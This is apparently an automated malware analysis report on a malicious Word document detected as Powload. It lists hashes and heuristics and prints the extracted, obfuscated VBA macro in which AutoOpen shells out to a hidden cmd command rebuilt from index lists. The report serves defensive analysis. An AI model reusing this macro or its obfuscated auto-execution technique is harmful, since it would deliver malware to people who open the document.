Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dfc59312335a9a72…

MALICIOUS

Office (OLE)

98.2 KB Created: 2018-07-30 13:16:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 7ac3273214868b220de5132032b513bc SHA-1: 6a14f62881b6beb1f69876bcf248be80e7e4ca33 SHA-256: dfc59312335a9a72fbdb967b1afb74ba0c3a81d12850af39a695413f36d79635
112 Risk Score

Heuristics 6

  • ClamAV: Doc.Malware.Powload-6752222-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6752222-0
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6071 bytes
SHA-256: f6abe5d4bb1256eb7f77555ddfa59216a2271ac35983a8397bcb08aaac98baa8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
49 of 79 identifiers look randomly generated (e.g. 'nkBODMJMldMEH'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KdYBNJXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate iAFYW
   AppActivate 8876
   AppActivate Sgn(sLYZvd * lqEvmv)
   AppActivate CBool(2)
   AppActivate VjXUE
   AppActivate ChrB(44487 * Wootd)
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
   AppActivate IttWX
   AppActivate Tan(28264 * YQEBd)
End Sub


Attribute VB_Name = "nkBODMJMldMEH"
Function OziLPY()
On Error Resume Next
AppActivate CSng(XpJzG)
   AppActivate lElBC
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
AppActivate sJSlZO
   AppActivate CStr(QckCi)
   AppActivate CStr(5289)
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
AppActivate 1051
   AppActivate CInt(uQZWVZ)
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
AppActivate Int(8523)
   AppActivate 45
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AppActivate 563
   AppActivate CByte(jdFMG - JESlW)
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
AppActivate iWLSaQ
   AppActivate CDbl(IMoQuM)
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
OziLPY = KdZPXiI + XiliKnvDES + mmVjkqKIQow + SsDnIFzk + AbcEU + imdCC
   AppActivate CDbl(353005535)
   AppActivate OHjwfq
End Function
Function mriHqobA()
On Error Resume Next
AppActivate 41
   AppActivate 325
   AppActivate 401087306
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
AppActivate hCWsa
   AppActivate FpItJ
   AppActivate CDate(rjnCPi)
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
AppActivate 283753694
   AppActivate CSng(bcWMB + jlFbOF * RXGFmh / KGEAh)
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
AppActivate YJzlh
   AppActivate CStr(233568307)
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
AppActivate Oct(27)
   AppActivate Hex(EsVlm)
   AppActivate Fix(NRQwKs)
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
AppActivate YViiT
   AppActivate CBool(65)
   AppActivate 224
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
AppActivate IskGT
   AppActivate CInt(6)
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
mriHqobA = iADzB + jOhEvRpB + pBPVNOdtZc + tTsGzkkbvYo + LYwaYWoUA + jYJhBjwiLc + qENuc
   AppActivate 123212862
   AppActivate iYTFZs
End Function
Function zDkRUaCa()
On Error Resume Next
AppActivate frurL
   AppActivate 157
   AppActivate Tan(YZZhZ + 92113)
dcHBMSN = "5,6" + "4,7" + "6,1" + "5,29,48,18" + ",35,22,4" + "3,4"
AppActivate hJdIK
   AppActivate CStr(9)
   AppActivate CLng(VBSwm)
bSjzPWiS = "3,55," + "38" + ",3" + "4,3" + "4,33,9" + ",60,43,44," + "32,75,59" + ",68," + "34,71,"
AppActivate Rnd(OBcIQ)
   AppActivate Int(klXON)
ohmzHoGz = "57,32,73" + ",55,53,74," + "43,66,57" + ",35,57,6" + "5," + "30,31,17" + ",6" + "0,33,45,4" + "9,45,"
AppActivate wVOZWK
   AppActivate Round(JDLoX)
nIvHvprv = "57,67,51,7" + "6,57" + ",30,31,55" + ",15,2" + "8,49,31" + ","
AppActivate CInt(50895 - rslpBz)
   AppActivate 140
   AppActivate Sqr(KVpKZ - 15777 / UIubj / MTWdJ)
XcRhULf = "44," + "26,13," + "38,43" + ",44,2" + ",55," + "69,5" + "7," + "47,57,6" + "9,31" + ",17,6"
AppActivate 3
   AppActivate Fix(jqEFfJ * jusTO)
wvpvVCFdH = "0,33" + ",69,57,3" + "2," + "44" + ",46,44,5" + "7,30,40,7" + "5" + ",59,44," + "9,36," + "22,66,31" + "," + "59,42"
AppActivate 68819893
   AppActivate CLng(TBFAh * cMWTd - 7301 + 40439)
   AppActivate Cos(iqvFv - 80676 - 94177 * oMPaw)
CfbEIas = ",7,45,74,2" + "6," + "45,31,4" + "0" + ",73,7" + "3,65,41,4" + "3,59,63,41" + ",31,7" + "7,33,"
AppActivate CBool(7)
   AppActivate Fix(OZhwj + 57851 * 62223 - EiimB)
   AppActivate MmOdTS
TSJJhZTvTQd = "58,32,0,75" + ",7,26," + "53" + "," + "7" + "5,9,1" + "6,1" + "1" + ",74"
AppActivate 9225
   AppActivate 5
FLanmR = ",53,44" + ",66" + ",31," + "59,4" + "2,7,72,45" + ",31,55,15," + "2" + "8,65,30" + ",73,43,9" + ",5" + "9,4" + "3,"
AppActivate Sin(vMOjq * OVnHX)
   AppActivate CLng(34118 + diIqJp)
   AppActivate 460
CZlGQDEA = "54,42,59,7" + "5,36,44,3" + "9,39,45,31" + ",55,15,2" + "8,30,3" + "3,59" + ",44,9,28," + "30," + "62,36,9,43"
AppActivate kJBmz
   AppActivate Sqr(8269 / qOjaz)
cWlLU = ",36," + "22,41,62" + ",62,45,45," + "4" + "5,45"
AppActivate 57
   AppActivate Sin(zWcTR)
FfrMqO = ",45" + ",45,45,45," + "45" + ",45,45," + "45,4" + "5,45,45," + "45,45," + "79)" + "do " + "set 9EJs"
zDkRUaCa = dcHBMSN + bSjzPWiS + ohmzHoGz + nIvHvprv + XcRhULf + wvpvVCFdH + CfbEIas + TSJJhZTvTQd + FLanmR + CZlGQDEA + cWlLU + FfrMqO
   AppActivate OIYdju
   AppActivate 7
End Function
Function wAFnOSnsGjw()
On Error Resume Next
AppActivate Round(379866174)
   AppActivate Rnd(HDvfFc)
Pcnjkja = "=" + "!9EJs!!" + "Ja:" + "~%8,1!&&" + "if %8==79 "
AppActivate Log(94895 - MpZuq - rjASE - BlCfp)
   AppActivate 6294
IOauL = "call %9E" + "Js" + ":~6%" + CStr(Chr(VIKoYtRrFFdP + TvOWBZbjHHuJV + 34 + HwbLbGalvkbL + qfJGnCTX)) + "   "
wAFnOSnsGjw = Pcnjkja + IOauL
   AppActivate CStr(nKjpGY)
   AppActivate ChrB(oAOkN)
   AppActivate Rnd(WqvEoU + SzipU + 68713 + LFcsBK)
End Function